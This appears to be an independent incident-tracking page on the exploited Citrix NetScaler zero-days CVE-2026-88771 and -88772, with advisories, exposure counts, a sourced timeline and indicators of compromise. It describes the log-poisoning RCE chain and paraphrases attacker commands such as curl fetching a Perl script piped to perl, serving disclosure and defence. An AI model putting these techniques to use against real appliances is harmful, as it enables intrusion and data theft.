- Type
- Improper input validation; unauthenticated remote command execution. [1]
- Exposure
- Affects the DEFAULT configuration; no features need to be enabled. [1]
- Root cause (CERT-EU)
- /netscaler/ns_monuploadd_err.pl passes unsanitised input to grep+exec; a tail -1 race condition is also involved. [27]
- Status
- Exploited in the wild; in CISA KEV since Sep 27. [1][7]
Critical Citrix NetScaler ADC / NetScaler Gateway
PitScaler - Citrix NetScaler Zero-Day Crisis
Two Citrix NetScaler ADC and NetScaler Gateway vulnerabilities, CVE-2026-88771 and CVE-2026-88772, were exploited in the wild as zero-days before disclosure. Both allow unauthenticated remote code execution (RCE) and are rated CVSS 4.0 9.5 Critical. Governments and companies across Europe shut down or disconnected their NetScalers while waiting for a patch. [25][82] Citrix fixed them in bulletin CTX697096 together with six other CVEs. [1][7]
- Confirmed exploited zero-days
- 2
- CVEs in bulletin CTX697096
- 8
- Public disclosure
- CISA KEV federal deadline
CVE-2026-88771, CVE-2026-88772
CVE-2026-88771 to -88778
15:51 UTC, per GreyNoise
KEV lists a date, no time; by CISA's 11:59 PM ET convention it expired 1 Oct 03:59 UTC — passed before this snapshot
Key facts
| Products | Citrix NetScaler ADC and NetScaler Gateway (customer-managed) |
|---|---|
| Confirmed exploited | CVE-2026-88771 (unauthenticated RCE, default configuration) and CVE-2026-88772 (DTLS memory overflow, RCE or DoS), both CVSS 4.0 9.5 and in CISA KEV [1][20] |
| Also in the bulletin | CVE-2026-88773 (chained in the attacks according to Beaumont, not independently confirmed) and CVE-2026-88774 to CVE-2026-88778 (no exploitation reported) [63] |
| Exploited since | At least early September 2026. Unit 42 traces fingerprinting back to 21 Aug and .deb webshell requests to 4 Sep, eSentire saw exploitation on 5 Sep, and ACSC advises reviewing from 4 Sep [96][48][17] |
| Fixed builds | 14.1-73.37, 13.1-64.23, 14.1-73.37 FIPS, 13.1.37.279 FIPS/NDcPP and later (details) |
| First action | Preserve evidence and check for compromise, then patch. Patching does not remove a backdoor (detection) |
| Attribution | No actor is named. Mandiant's CTO says suspected state-sponsored actors are likely behind the initial CVE-2026-88772 intrusions [84]; Beazley notes no vendor has named an actor [43] |
| Recommended by | Germany's BSI links to this site and recommends its IoC list (warning BITS-H 2026-289305-1132, 1 Oct 2026). [18] |
| This page | Independent historical snapshot, not a live feed. Every claim is sourced and labelled official, research, telemetry or reported (methodology) |
Overview: exploited NetScaler zero-day vulnerabilities
What happened
Citrix published bulletin CTX697096 with fixes for eight NetScaler ADC and Gateway CVEs on 27 September 2026. [1] The same day, CISA added CVE-2026-88771 and CVE-2026-88772 to the Known Exploited Vulnerabilities catalog, with a federal remediation deadline of 30 September. [7]
Google GTIG and Mandiant report that CVE-2026-88772 has been exploited since at least early September. Organisations in North America and Europe in government, financial services, education, and legal and professional services were likely affected. The attackers used new custom malware: WHIPSHOT, a PHP webshell, and SLAPSHOT, a Python tunneler that reaches into internal networks. [34]
eSentire's incident response saw CVE-2026-88771 exploited as early as 5 September. In one intrusion a webshell was installed and operated from that day, with signs of data exfiltration and lateral movement into the internal network. eSentire advises treating appliances that were Internet-facing and unpatched in early September as potentially compromised. [48]
Unit 42 counted 50,277 exposed NetScaler instances that could potentially be vulnerable, as of 27 September, from its Cortex Xpanse data. That is an exposure count, not a count of compromised systems. [96]
Censys detects NetScaler ADC or Gateway on 42,735 hosts, as of 28 September. The largest shares are in the US (32%) and Germany (13%). Shadowserver reports more than 20,000 instances exposed and potentially at risk. Both are exposure counts, not confirmed vulnerable or compromised systems. [60][98][97]
Who is affected and who responded
- Victims: GTIG/Mandiant say organisations in North America and Europe in government, financial services, education, and legal and professional services were likely affected. [34][95] watchTowr CEO Benjamin Harris says there is no clear trend yet by industry or organisation size. Mandiant says dozens of organisations were hit, telecommunications among them. [101][95]
- US: CISA added both CVEs to KEV and gave federal agencies until 30 September. [7] Beaumont publicly pointed the NSA at one of its Citrix hosts. The host has been validated as NSA-operated; whether it is compromised is not verified. [69]
- Netherlands: NCSC-NL rates the advisory as high probability, high damage. Central government applied "loskoppelen tenzij" (disconnect unless) from 26 September. The Ministry of the Interior took all Citrix environments offline, and the Amphia (Breda) and ETZ (Tilburg) hospitals closed their patient portals after Z-CERT warned the healthcare sector. [100][105][9][25]
- Germany: BSI rates its warning 3 / Orange (act immediately), says logs should be checked back to at least early September, and links to this site as a collection of detection options and IoCs, and recommends that operators use its growing IoC list. [18]
- Denmark: Danish government agencies, among them PET, the Armed Forces and the police, took their NetScalers offline from Friday 25 September, two days before Citrix's disclosure. Copenhagen Airport also switched off its Citrix environment, and Shodan shows some Danish systems going dark from 23 September, according to Ingeniøren. The Danish Defence Intelligence Service (FE) warned NetScaler users on 27 September. DKCERT, the CERT for Danish universities and research institutions, followed on 29 September. [99][22]
- UK and EU: NCSC-UK published an alert, and NHS England's cyber security operations centre issued alert CC-4858, rating further exploitation "almost certain". CERT-EU published Security Advisory 2026-014 and a technical writeup with hunting guidance, and Luxembourg's CIRCL published a set of per-CVE configuration checks. [23][21][10][27][24]
- Australia: ACSC says Australian organisations have confirmed exploitation since its 28 September alert, and advises reviewing for compromise since at least 4 September. Its 3 October update adds the new SAML issue: ACSC "is aware of impacts to Australian organisations", says a remote attacker may induce system crashes, denial of service and potential exploitation, and points to Citrix's SAML guidance. The alert's original background text, still lower on the page, says no Australian exploitation of the September CVEs had been confirmed at first publication. [17]
- France, Luxembourg and Quebec: CERT-FR says exploitation began before patches existed and relays the GTIG indicators, which it has not qualified. The CSSF tells supervised financial entities that unauthenticated remote code execution is a major ICT-related incident to notify, and CERT Quebec rates the risk critical. [13][14][15]
- Finland: NCSC-FI (Traficom) confirmed intrusions in Finland that began before the 27 September patches were released, warns that internet-facing systems must be assumed exposed and that updating alone may not be enough, and says it has identified hundreds of Finnish NetScaler instances and contacted their administrators. [19]
- Canada, Hong Kong and Singapore: CCCS, HKCERT and CSA Singapore issued advisories. [12][17][16][11]
GreyNoise sensors recorded exploitation from one IP on 24 September, three days before public disclosure. GreyNoise's retro-hunt found no other exploitation sessions before disclosure. That result covers GreyNoise's own sensors, not all Internet activity. [53][54]
The name
Kevin Beaumont (@GossiTheDog) coined the name "PitScaler" on 28 September. [66] It refers to the root cause: a Perl script writing to /tmp. CERT-EU's writeup title describes this as Citrix taking execute logging a bit too literally
. [27]
Reported by Beaumont Unverified claims
- Chaining CVE-2026-88771, -88772 and -88773 gives unauthenticated RCE in the default appliance configuration. Webshells were dropped throughout September. He calls the attackers
Probably nation state aligned
. [63] The quote was checked against the post on 29 September. GTIG/Mandiant separately confirm webshells since at least early September. [34] No one else has confirmed the CVE-2026-88773 link. On attribution, Mandiant's CTO separately says advanced and suspected state-sponsored actors are likely behind the initial CVE-2026-88772 intrusions, without naming an actor [84], and watchTowr says no attribution has been made public. [95] - He says he is tracking over 100 victim organisations, each with a unique webshell. [66]
- His firmware version scanning suggests fewer than 10% of boxes are patched. [68]
These figures are Beaumont's own public statements and have not been independently confirmed.
The eight NetScaler vulnerabilities (CVEs) in CTX697096
Citrix's bulletin lists all eight CVEs with CVSS 4.0 scores and preconditions, and NCSC-NL's advisory NCSC-2026-0394 gives the same figures. Only CVE-2026-88771 and CVE-2026-88772 are confirmed exploited. [9][1][7]
- Type (Citrix)
- Memory overflow leading to RCE or DoS when DTLS is enabled. [1]
- Exposure
- DTLS is ON by default on VPN virtual servers unless the admin sets -dtls OFF. [1]
- Campaign (GTIG/Mandiant)
- Exploited since at least early September. Exploitation crashes the NSPPE packet engine and gives root-level access. Organisations in North America and Europe in government, financial services, education and legal/professional services were likely impacted. [34]
- Mechanics (watchTowr)
- Preauth heap overflow in the DTLS stack (nsppe process); 137,825 bytes written past the buffer; control gained via an overwritten global list pointer, then a ROP chain calling mprotect and jumping to shellcode - full RCE, not just DoS. [30]
- Status
- Exploited in the wild; in CISA KEV since Sep 27. [1][7]
- Config check (Citrix)
- Citrix: a Gateway is vulnerable unless DTLS is explicitly disabled. add vpn vserver vpn1 SSL 10.0.0.0 443 -Listenpolicy NONE means DTLS is on by default; the same line with -dtls OFF means it is off. add vpn vserver vs1 DTLS 10.11.1.1 443 and add lb vserver vd_dtls DTLS 10.146.111.74 443 mean DTLS is enabled. [1]
- Type
- HTTP request smuggling (CWE-444). [1][9]
- Precondition
- HTTP configuration enabled on NetScaler ADC or Gateway. No authentication or user interaction needed (NCSC-NL). [1][9]
- Role (Beaumont)
- Used in a chain with CVE-2026-88771 and CVE-2026-88772 in the original attacks, according to Beaumont. Not independently confirmed; no source reports it exploited on its own. [63]
- Config check (Citrix)
- Citrix: met when load balancing, content switching, VPN or authentication virtual servers of type HTTP or SSL exist (add lb, cs, vpn or authentication vserver, followed by a name and HTTP or SSL). [1]
- Type
- Feature policy bypass due to improper HTTP URL-based expression usage (CWE-16). [1][9]
- Precondition
- Any policy expression configured with an HTTP URL-based expression. [1]
- Config check (Citrix)
- Citrix: the same virtual-server check as CVE-2026-88773 (HTTP or SSL virtual servers on LB, CS, VPN or authentication). [1]
- Type
- Memory overflow leading to unpredictable behaviour or denial of service (CWE-119). [1][9]
- Precondition
- Configured as a Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. [1]
- Config check (Citrix)
- Citrix: look for configuration lines matching add vpn vserver .* (Gateway) or add authentication vserver .* (AAA). [1]
- Type
- Memory overflow leading to unpredictable behaviour or denial of service (CWE-119). [1][9]
- Precondition
- LB/CS or CGNAT-LSN/NAT64 device with a non-HTTP L7 protocol feature enabled. [1]
- Config check (Citrix)
- Citrix gives case-insensitive configuration-text patterns (not CLI commands) to search in /nsconfig/ns.conf or show ns runningConfig: FTP over LB or CS (add (lb|cs) vserver .* FTP, add service .* FTP), FTP health monitors (add lb monitor .* FTP or FTP-EXTENDED), LSN groups (add lsn group .*; FTP ALG counts as enabled unless set lsn group .* -ftp DISABLED is present), RTSP (set lsn group .* -rtspalg ENABLED), DNS64 (add lb vserver .* DNS .* -dns64 ENABLED; add dns policy64 counts only if bound to a DNS virtual server) and NAT64 (add nat64). [1]
- Type
- TCP Initial Sequence Number (ISN) prediction (CWE-342). [1][9]
- Precondition
- TCP configuration enabled. CIRCL gives a CLI check for disabled Enhanced ISN Generation. [1][24]
- Fix
- Closed by enabling Enhanced ISN Generation; the upgrade alone does not fix it. [1][94][21]
- Config check (Citrix)
- Citrix: both must be true. (1) At least one virtual server of type HTTP, SSL, SSL_BRIDGE, TCP, SSL_TCP, FTP, NNTP, RTSP, RDP, DNS_TCP, DOT, SIP_TCP, SIP_SSL, DIAMETER, SSL_DIAMETER, MYSQL, MSSQL, ORACLE, SMPP, MQTT, MQTT_TLS, MONGO, MONGO_TLS, PROXY, SSL_PROXY, USER_TCP or USER_SSL_TCP. (2) show ns tcpparam | grep "Enhanced ISN Generation" returns DISABLED. [1]
Timeline
Times are UTC unless marked otherwise. Events without a time show only their date. Expand an event to see its sources.
- Research
Unit 42: earliest activity is NetScaler version fingerprinting
On 21 Aug 104.248.244.66 and then 77.83.199.39 requested /admin_ui/common/css/ns/ui.css and /vpn/js/rdx/core/lang/rdx_en.json.gz from a US NetScaler Gateway. On 21 and 22 Aug these two hosts and 78.47.24.217 sent the same requests to more than 100 other systems. Unit 42 describes this as fingerprinting, not exploitation.
Sources: [96]
- Research
Unit 42: .deb webshell requests begin (CVE-2026-88772 chain)
From 4 to 24 Sep the actor repeatedly requested .deb files in /vpn/scripts/linux/, rotating infrastructure: one VPS per day on 4-8 Sep, Cloudflare WARP addresses on 9-11 Sep, 162.33.178.9 on 14 Sep and 193.149.176.207 daily on 15-24 Sep. A continuous stream of requests to /logon/LogonPoint/Authentication/GetUserName ran from 10 Sep until 01:54 UTC on 27 Sep, hours before the bulletin.
Sources: [96]
- Research
eSentire: CVE-2026-88771 exploited as early as 5 September
eSentire TRU incident response saw exploitation of Internet-facing NetScaler Gateways from 5 Sep, more than three weeks before disclosure: base64 PHP staged in the access log via fake /vpn/media/*.ico requests, then executed through a crafted login username. In one intrusion a .deb-variant webshell was installed and operated from 5 Sep, with signs of data exfiltration and lateral movement to internal virtual desktops and back to the appliance over SSH.
Sources: [48]
- Official advisory Validated
CVE IDs reserved
NetScaler reserves CVE-2026-88771 and CVE-2026-88772 at 07:14 UTC. The records were published on 27 Sep at 16:02 and 16:09 UTC.
Validated against the CVE record on 29 Sep.
- Research
Unit 42: three-stage CVE-2026-88771 chain drops a PHP webshell
77.83.199.39, 78.47.24.217 and 139.180.152.138 staged a Base64 dropper in the User-Agent (logged to httpaccess-vpn.log), poisoned ns.log with a fake pitboss heartbeat message, and had ns_monuploadd_err.pl -WR decode and run it, installing the .ctxs.receiver webshell at a US target.
Sources: [96]
- Reported observation
Danish NetScalers start going offline
Ingeniøren's review of Shodan data shows several Danish NetScaler systems switched off from 23 Sep, four days before Citrix's public disclosure.
Sources: [99]
- Telemetry
GreyNoise sensors see exploitation from a single IP
149.104.78.141: 3 sessions 07:32:19-07:32:20 UTC. IP flagged "suspicious" (Citrix ADC Gateway Login Panel Crawler), then "malicious" (Generic ${IFS} Use in RCE Attempt; CitrixBleed 2 attempt). Later retro-tagged as CVE-2026-88771. GreyNoise's retro-hunt found no other exploitation sessions before disclosure - this covers GreyNoise sensors only.
- Reported observation Validated
Danish government agencies shut down their NetScalers
Danish agencies, among them PET, the Armed Forces and the police, took their Citrix NetScaler environments offline from Friday 25 Sep, two days before Citrix disclosed the vulnerabilities. Ingeniøren later reported the shutdowns from Shodan data; none of the agencies would explain why.
The Friday 25 Sep shutdown was validated independently on 30 Sep.
Sources: [99]
- Official advisory
NCSC-NL confidentially warns Dutch organisations
On the afternoon of Friday 25 Sep, after a tip from a European partner, NCSC-NL confidentially informed companies and organisations, including central government, about two NetScaler zero-days being exploited outside the Netherlands, before any patch existed. Dark Reading reports that a copy of the pre-notification, marked TLP:AMBER+STRICT, was briefly posted on Reddit and then deleted. According to BleepingComputer, the notice said Citrix found the vulnerabilities while investigating incidents at customers and filed a notification under the EU Cyber Resilience Act.
- Reported observation Validated
r/Citrix "Netscaler leak?" thread
User FastFredNL opens the thread at 06:43:22 UTC (08:43 CEST), reporting that an IT provider advised shutting NetScalers down immediately. It becomes the first public gathering point, with admins reporting similar unofficial advice over the weekend. Dark Reading dates the first reports to 25 Sep, but the thread itself was posted on 26 Sep.
Post timestamp checked on the thread itself (30 Sep). The shutdown advice is consistent with the Dutch government letter to parliament.
- Research
watchTowr: two unpatched RCE zero-days, found during forensics
Two vulnerabilities - both RCE. Unpatched, 0days. Exploited in-the-wild - discovered during forensics.
watchTowr adds that Citrix comms and patches are expected early the following week.
Sources: [51]
- Reported observation
IFIN opens a public tracking thread
IFIN starts compiling public reporting and observables for the NetScaler zero-days; it later states that all observables it shares were shared without restriction.
Sources: [57]
- Reported observation
watchTowr: pull NetScaler appliances offline immediately
Please, take this seriously and pull NetScaler appliances offline immediately.
watchTowr publicly warns that credible rumours of unpatched NetScaler RCEs are circulating; later that day CEO Benjamin Harris says the rumours are confirmed and urges admins to pull NetScaler appliances offline immediately.
Sources: [104]
- Reported observation
Dutch hospitals Amphia and ETZ close patient portals
Patients of Amphia (Breda) and Elisabeth-TweeSteden Ziekenhuis (Tilburg) cannot log in to their portals; other Dutch hospitals report problems too. That evening Z-CERT, the Dutch healthcare CERT, says it warned the sector about critical vulnerabilities in Citrix NetScaler and advised temporarily switching the system off.
Sources: [105]
- Official advisory
Public disclosure; Citrix publishes CTX697096 with fixes
Disclosure time per GreyNoise. The bulletin covers 8 CVEs. watchTowr notes the patch it analysed was dated 24 Sep, suggesting Citrix knew of the exploitation the week before.
- Official advisory
Citrix announces the bulletin on r/Citrix
A Citrix staff account (CTX-Michael) posts a CRITICAL UPDATE in r/Citrix linking the CTX697096 bulletin and the Citrix community blog post with its IoC section, and quoting that exploitation of CVE-2026-88771 and CVE-2026-88772 on unmitigated deployments has been observed.
- Telemetry
GreyNoise deploys CVE-specific tag
Tag deployed 20:28:39 UTC; the 24 Sep sessions are retro-tagged as CVE-2026-88771.
- Official advisory Validated
CISA adds CVE-2026-88771 and CVE-2026-88772 to KEV
Both were added on 27 Sep with a federal remediation deadline of 30 Sep. The 21:30 UTC release time comes from the compiled dataset and was not found in the sources checked.
Dates validated against the KEV catalog feed on 29 Sep.
- Telemetry
Unit 42: 50,277 exposed instances
Palo Alto Networks Cortex Xpanse identifies 50,277 exposed NetScaler instances that could potentially be vulnerable (update posted 4:15 p.m. PT). Exposure, not confirmed compromise.
Sources: [96]
- Official advisory
Danish Defence Intelligence (FE) and CERT-EU warn NetScaler users
The Danish Defence Intelligence Service sent a warning urging NetScaler users to update, per Ingeniøren. CERT-EU published Security Advisory 2026-014 recommending an immediate update of all customer-managed appliances and enabling Enhanced ISN Generation where TCP is configured.
- Reported observation
Beaumont: three CVEs chained, webshells all September
The primary vulns being exploited are CVE-2026-88771, CVE-2026-88772, CVE-2026-88773 chained. It gives unauth RCE in default appliance config. Attackers using it to drop webshells all month of September. Probably nation state aligned
Beaumont's claim; attribution not independently verified.
Sources: [63]
- Reported observation
Beaumont: patches live, detection script behind NDA
patching alone doesn't remove the backdoors being placed
Patches are live on the main support site; Citrix's detection script is locked behind NDA/support.
Sources: [64]
- Reported observation Validated
Beaumont: Console check misses earlier attempts
The NetScaler Console check misses earlier semi-successful attempts because it relies on logs not having rotated; he adds that the activity is weeks old because of slow disclosure.
Validated independently on 29 Sep.
Sources: [65]
- Official advisory
NHS England alert CC-4858
NHS England's National CSOC rates the threat High and assesses further exploitation as almost certain. It strongly recommends a compromise assessment before patching, since patching first may delete evidence, and warns that end-of-life 12.1 and 13.0 releases are likely vulnerable and receive no fix. Published 10:40 UK time.
Sources: [23]
- Reported observation
Beaumont names it "PitScaler"
I'm tracking over 100 victim orgs now. Each one has a unique webshell which can't be scanned for remotely unless you're the attacker. It's espionage.
Victim count is Beaumont's claim, not independently verified.
Sources: [66]
- Reported observation Validated
Beaumont: Citrix checker incomplete
Some really big orgs are backdoored after patching still
The checker does not check for suid on /bin/sh; Beaumont calls on NCSCs to publish a detection script.
The missing suid /bin/sh check was validated independently on 29 Sep. The claim about big organisations still being backdoored is not independently verified.
Sources: [67]
- Official advisory
CERT-FR, CSSF (Luxembourg) and CERT Quebec issue alerts
CERT-FR says the two vulnerabilities allow unauthenticated remote code execution, are actively exploited and were exploited before patches existed. The CSSF points supervised financial entities to the CIRCL report and reminds them that unauthenticated remote code execution is unauthorised access, so it counts as a major ICT-related incident to notify under DORA or its national circulars. CERT Quebec rates the risk critical (TLP:CLEAR) and says Quebec public bodies using a vulnerable product must test and deploy the vendor updates or mitigations.
- Reported observation
Press covers the weekend shutdown warnings
BleepingComputer, SecurityWeek, The Record and CyberScoop cover the story.
- Research
CERT-EU technical writeup on CVE-2026-88771
"Taking 'execute logging' a bit too literally" - root cause, attack chain and hunting guidance.
Sources: [27]
- Official advisory
Government advisories worldwide
NCSC-NL NCSC-2026-0394 [H/H], NCSC-UK, CSA Singapore AL-2026-129, plus Canada, HKCERT, ACSC, and CIRCL TR-100 with per-CVE config-check CLI commands.
- Telemetry
GreyNoise publishes TLP:CLEAR IoC set
"Swarming Against Citrix 0-Day Exploitation" - the first public IoC set in this compiled dataset as of 29 Sep, with a companion Chronicle timeline.
- Research
watchTowr Labs part 1 (CVE-2026-88771)
"Oh Look, the Foot Gun Went Off Again", published with a Detection Artefact Generator (PoC-class tool).
- Telemetry
Censys and Shadowserver count exposed NetScalers
Censys detects NetScaler ADC or Gateway on 42,735 hosts and 323,527 web properties; these are exposed instances, not confirmed-vulnerable counts. Shadowserver reports more than 20,000 instances exposed and potentially at risk.
- Telemetry
Lupovis honeypots see exploitation minutes after the public PoC
Lupovis says its sensors recorded live CVE-2026-88771 exploitation attempts within minutes of watchTowr releasing its PoC; the attempts were opportunistic, from several distinct actors.
- Research
First public detection rules
Elastic merges a rule for NetScaler log-poisoning command injection; Corelight publishes Zeek hunting queries. Sigma and Nuclei pull requests follow (28-29 Sep, still unmerged at snapshot time).
- Research
Truesec publishes potential C2 IPs
Truesec lists 104.248.244.66, 139.180.152.138 and 77.83.199.39 as potential C2 IPs it has observed.
Sources: [33]
- Official advisory Validated
ACSC alert; Australian organisations later confirm exploitation
Australia's ACSC publishes an alert on 28 Sep. In an update it says Australian organisations have since confirmed exploitation, and recommends reviewing for evidence of compromise since at least 4 Sep 2026. The original background text, still lower on the page, says no Australian exploitation had been confirmed at first publication.
Both statements checked on the ACSC page on 1 Oct.
Sources: [17]
- Reported observation
Dutch ministry and hospitals take systems offline
The Dutch Ministry of the Interior took all Citrix environments offline over the weekend; patients of two major hospitals (Amphia and ETZ) could not view their records, and Frisius MC in Leeuwarden shut down some digital systems as a precaution (SDxCentral, citing Techzine).
Sources: [100]
- Research
Sygnia: new "unexpectedly died" log-poison variant
Sygnia saw commands after pitboss PPE unexpectedly died NSPPE; in raw logs: copying ns.conf to /var/netscaler/logon/insight-new.js (00:59 UTC), curl of update_c08937.pl from 64.94.85.67 piped to perl (03:18 UTC) and whoami (04:05-04:07 UTC). Sygnia notes this shows the commands reached the vulnerable logging path, not that they ran.
Sources: [37]
- Reported observation
Beaumont: mass exploitation
#PitScaler is under mass exploitation, seeing it spray and pray now. I've done some firmware version scanning, fewer than 10% of boxes are patched
The <10% figure is Beaumont's own estimate, not independently verified.
Sources: [68]
- Reported observation Compromise unverified
Beaumont posts a public message to the NSA
do forensics on 103.41.70.207,vdicorp.nsa.gov
The domain resolves to that IP. That the host is an NSA-operated Citrix system has been validated independently. That it is compromised is Beaumont's implication and is not verified. This briefing does not identify any organisation as compromised, and these values are not listed as IoCs.
Sources: [69]
- Reported observation Validated
Beaumont: IR writeups expose victim-unique indicators
IR vendors are publishing PitScaler writeups containing victim-unique webshell names (.sig files) and attacker IPs, which he says lets him map victim orgs via network traffic. He warns that unremediated orgs' published webshell names can be used to access their boxes, and says one vendor uploaded its IR investigation to VirusTotal.
Validated independently on 29 Sep.
Sources: [70]
- Reported observation
The Register: government, banks and professional services targeted
Why Citrix took so long to disclose these vulnerabilities is a question only Citrix can answer
It reports GTIG/Mandiant findings that government, financial services, education and legal and professional services organisations in North America and Europe were likely hit. watchTowr CEO Benjamin Harris criticises the slow disclosure and says no attribution has been made public.
- Research
watchTowr Labs part 2 (CVE-2026-88772)
"Here We Go Again" (Sina Kheirkhah) - full RCE analysis plus a second Detection Artefact Generator.
- Research
Google GTIG / Mandiant: custom malware WHIPSHOT and SLAPSHOT
The CVE-2026-88772 campaign has been ongoing since at least early September. WHIPSHOT is a PHP webshell staged with a .deb disguise that hides base64 C2 in HTTP headers; SLAPSHOT is a Python TCP tunneler (open/push/pull/exch/close/ping) used to reach internal networks for reconnaissance and credential theft.
- Reported observation
BleepingComputer: credential theft and internal spread
It reports that attackers exploited CVE-2026-88772 to deploy webshells and tunneling malware, gain root, steal credentials and spread into internal networks, citing Mandiant. GTIG itself describes the credential theft and internal reconnaissance in at least one observed intrusion.
- Reported observation Validated
Mandiant CTO: check for compromise before patching
Given the active exploitation, NetScaler customers should prioritize examining their systems for compromise *before* upgrading/patching
Charles Carmakal on LinkedIn, as quoted by The Register.
Quote validated against a second, non-public source on 29 Sep.
Sources: [95]
- Research
Nextron releases THOR rules and a NetScaler filesystem IoC set
Three rules in the THOR Preview channel (higher false-positive rate than stable rules) plus a YAML IoC set derived from the filesystem checks in Citrix's scanner script. A match is a lead, not proof.
Sources: [35]
- Research
eSentire publishes first-hand IR findings and IoCs
Two webshell variants (.ico and .deb), 14 IPs and 2 SHA-256 hashes; the technique matches CERT-EU's description. eSentire advises treating appliances that were Internet-facing and unpatched in early September as potentially compromised until an integrity assessment shows otherwise.
Sources: [48]
- Telemetry
Defused: hundreds of decoy hits across multiple exploit paths
Defused reports hundreds of CVE-2026-88771 hits on its decoys in 24 hours via /nf/auth/doAuthentication.do, /cgi/login, /p/u/doLogon.do, /logon/LogonPoint/tmindex.html and User-Agent payloads on /. Observed follow-up: whoami/id to prove root, nx_verify.html marker files, curl/wget/fetch pulling a second stage, and blind DNS callbacks. Full IoCs are on Defused Radar (not reproduced here).
Sources: [61]
- Official advisory
DKCERT warns Danish universities and research institutions
DKCERT, the CERT for the Danish research and education network, reports two critical NetScaler zero-days exploited before a patch and notes that several administrators took systems offline before Citrix published details.
Sources: [22]
- Reported observation
Mandiant: dozens of organisations impacted
Cybersecurity Dive reports Mandiant CTO Charles Carmakal saying the actor deployed webshells and moved laterally into internal networks at some targets, with dozens of organisations impacted across North America and Europe, including telecommunications.
Sources: [101]
- Official advisory
Dutch government confirms preventive disconnection
Letter to parliament: on Saturday 26 Sep the CIO Rijk set the line "loskoppelen tenzij" (disconnect unless) for central government, and it was broadly applied; remote-work access has not yet been restored everywhere while the patch is tested and forensic investigation continues. Beaumont relays it at 18:32 UTC as "shut down all Citrix Netscalers".
- Reported observation
Ingeniøren: PET, Danish Defence and police shut down Citrix
Based on Shodan data, Ingeniøren reports that PET, the Danish Armed Forces, the Danish police and Copenhagen Airport, among many others, had to switch off their Citrix environments over the weekend. None of the agencies would explain why.
Sources: [99]
- Research
Unit 42 expands its threat brief
Adds pre- and post-disclosure activity back to 21 Aug, analysis of the nsg64.deb RC4 webshell and the .ctxs.receiver webshell, hunting queries and a formal IoC list. Updated 15:00 PT.
Sources: [96]
- Official advisory
CERT-FR updates its alert with GTIG indicators
The update relays the GTIG/Mandiant indicators and YARA rules, which ANSSI says it has not qualified, and the two patterns GTIG calls characteristic of successful exploitation: a DTLS handshake-failure line in syslog, and a pitboss NOT restarting NSPPE line in /var/log/messages. CERT-FR also says it knows of public proof-of-concept code for CVE-2026-88771 (noted 28 Sep) and for CVE-2026-88772.
Sources: [13]
- Official advisory
NCSC-NL revises its advisory to version 1.0.1
The revision (30 Sep) extends the recommended actions with information on the Console scan script and IoCs, and says customers without Console should ask Citrix Support for the generic IoCs. The advisory says installing the update prevents new abuse but does not rule out earlier abuse, advises securing relevant logging and a memory dump before updating, and says appliances that were internet-facing before the update should be treated as possibly compromised.
Sources: [9]
- Research
TENEX traces a Platypus C2 chain from the injected login
From malicious login requests TENEX followed four rotating staging hosts to a shell loader that enrols the off-the-shelf Platypus agent from entretiensol.com, then mapped a four-node C2 cluster through one shared TLS certificate. It also recovered the Python (customsnmpd reverse shell) and Perl (sec_monitor, .local_journal webshell, SUID /bin/sh, config theft) stages, and saw a separate loud wave of commodity payloads after the public PoC. TENEX does not name an actor and says logs show attempts, not confirmed execution.
Sources: [38]
- Official advisory
Citrix updates its community bulletin
Last updated 30 Sep. It adds: a known issue where 13.1-64.23 can enter a reboot loop during upgrade if show ns variable lists variables (use 13.1-64.24); a Console Security Advisory scan that may wrongly flag 13.1-64.23 as vulnerable until the next automatic advisory update; a note that NetScaler VPX 15.1 Technology Preview is also vulnerable, is not permitted in production, and a fix will follow; and that samlRejectUnsignedAssertion OFF is no longer supported and is converted to the secure default on upgrade. For suspected compromise Citrix recommends deploying a new, updated instance rather than relying on the update, forwarding logs to an external SIEM, and using Console File Integrity Monitoring.
Sources: [4]
- Research
Arctic Wolf publishes follow-up exploitation IoCs and the nsmon.pl implant
Commands fetched Python, Perl and shell scripts, opened reverse shells and sent Base64 command output over HTTP. The 3,752-byte Perl script nsmon.pl installs under /var/tmp/.nsmon, attempts to add a root cron entry every five minutes, attempts to listen on a port in 41000-41999 and begins a UDP or TCP check-in. These are attempts in the visible code, not proven persistence. Arctic Wolf also shows the injected username as it appears in AAA, AAATM and SSLVPN appliance logs.
Sources: [36]
- Research
Sygnia publishes an IR-based advisory
Investigation-derived indicators (IPs, .sig artefacts, a JSON artefact and a SHA-256) that Sygnia stresses are context-specific and not Citrix-published; validate NAT and direction before blocking.
Sources: [37]
- Reported observation
Mandiant CTO: suspected state-sponsored actors likely behind the first intrusions
Help Net Security relays Carmakal saying advanced and suspected state-sponsored threat actors are likely behind the initial targeted intrusions that used CVE-2026-88772, with dozens of organisations impacted across North America and Europe. No actor is named.
Sources: [84]
- Official advisory Deadline - upcoming
Deadline: CISA KEV federal remediation
Both CVEs were added to KEV on 27 Sep with a due date of 30 Sep, giving US federal agencies three days. The required action is to apply Citrix mitigations under BOD 26-04 and CISA's Forensics Triage Requirements, or stop using the product if mitigations are unavailable; the KEV notes say customers must conduct forensic triage. The KEV entry gives a date only (2026-09-30), no time of day. CISA's directive deadlines are conventionally 11:59 PM U.S. Eastern (23:59 EDT, 03:59 UTC on 1 Oct), and third-party KEV trackers treat the due date the same way, but CISA publishes no official time for KEV due dates - so the deadline was passed by 1 Oct 04:00 UTC at the latest. A deadline, not an event.
- Reported observation
Beaumont: Arctic Wolf set is new "spray and pray" activity
He says the follow-up activity covered by the Arctic Wolf IoCs is definitely not related to the initial actor in early September.
Sources: [73]
- Research
Poppelgaard checker v1.9 adds public indicators
Release 1.9 of the free, read-only CTX697096 checker script adds, among others, Arctic Wolf's nsmon.pl implant, the Unit 42 .deb webshell and more attacker IPs, and tags each attack line as before or after the fix. Its author says a clean result is not proof of a clean appliance.
Sources: [39]
- Official advisory
NCSC-FI (Finland): confirmed intrusions in Finland before the patches
The National Cyber Security Centre Finland (NCSC-FI, part of Traficom) publishes an alert after receiving reports of active exploitation of the CTX697096 vulnerabilities in Finland, including intrusions that began before Citrix released the security updates on 27 September. The underlying Finnish warning page (Warning 1/2026) classifies it as a yellow warning ("Keltainen varoitus"). NCSC-FI says internet-facing NetScaler systems should be assumed to have been exposed to attacks, that updating alone may not be enough because an attacker may have established a persistent foothold, and that organisations must investigate for compromise even if they patched quickly: review logs and administrative changes, check user accounts created on the systems, scheduled tasks, services and other persistence, and change administrative passwords if compromise is suspected. NCSC-FI says it has identified hundreds of NetScaler instances in Finland and contacted their administrators, and asks organisations to report observed exploitation and intrusions.
Sources: [19]
- Official advisory
